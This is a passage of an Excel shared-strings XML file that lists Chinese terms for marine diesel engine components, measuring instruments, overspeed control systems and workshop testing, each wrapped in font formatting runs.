  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-PTO</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧梁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧燃烧室</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧条垫片</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧置轴布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧纵梁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量表格，往复运动部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量工具组件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量开关铭牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量销安放</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量仪</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量仪器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测漏仪</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> 11MM</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测漏仪</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> 8MM</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>HHJ</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试表格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试法兰的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试后间隙检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试伺服器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试伺服器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试伺服器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试伺服器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服活塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试伺服器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服气缸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试形态指导</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试用备件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试轴，阀座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测速编码器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测速传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测速传感器布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测速计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测速设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测速系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测速装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>层级环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>叉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>叉臂导块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>叉臂</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺距调节器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>叉杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>叉杆端部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>叉口扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>叉头单杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>叉组装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插床螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插入连接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插入式旋转工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插入式钻杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插塞键</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插塞接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>差压变送器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>差值发信器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拆卸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拆卸工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拆卸螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拆卸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机比较</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机安装垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机机架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底架工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机开关</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机描述</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机清洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机顺时针运转</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机性能和状况</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机一般排气布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缠绕式垫片</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>产品手册封面</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>常规维修用起动工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>场地试验，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>MC-S</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>超速保护系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>超速闭管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>超速电磁继电器组装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>超速和气动气缸安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>超速控制布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>超速控制系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>超速释放管路</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>超速停车图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>超速停车箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>超速运行</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>车刀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特制</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>车间测试</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>车间试车，交货</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>车间试车，磨合试车</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>车间试验</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>车间试验与航海试验</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>车钟</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
